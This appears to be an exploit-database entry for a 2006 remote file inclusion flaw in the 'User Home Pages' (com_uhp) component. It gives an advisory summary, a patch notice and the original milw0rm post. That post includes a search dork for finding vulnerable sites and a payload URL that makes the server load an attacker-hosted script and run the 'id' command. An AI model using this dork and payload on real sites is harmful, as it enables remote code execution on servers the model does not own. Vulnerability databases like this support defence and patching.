header-logo
Suggest Exploit
vendor:
User Home Pages
by:
Kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: User Home Pages
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Kurdish Security – Freedom For Ocalan

A remote file inclusion vulnerability exists in the User Home Pages component of Raven Portal, which allows an attacker to include arbitrary files from remote locations. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter of the 'uhp_config.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. Successful exploitation will result in arbitrary remote file execution.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch immediately after appropriate testing.
Source

Exploit-DB raw data:

>>> Kurdish Security

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

>>> Rish : High

>>> Class : Remote

>>> Script : User Home Pges

>>> Site : www.ravensportal.co.uk

>>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends

Code :

global $mosConfig_absolute_path;
require($mosConfig_absolute_path."/administrator/components/com_uhp/uhp_config.inc");

d0rkiz : allinurl:"com_uhp"

http://www.w0rkzsite.com/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=y0urscripts.txt?&cmd=id

And used link :]

footer.php
functions.php
install.uhp.php
toolbar.uhp.html.php
uhp.class.php
uhp_config.php
uninstall.uhp.php

# milw0rm.com [2006-07-30]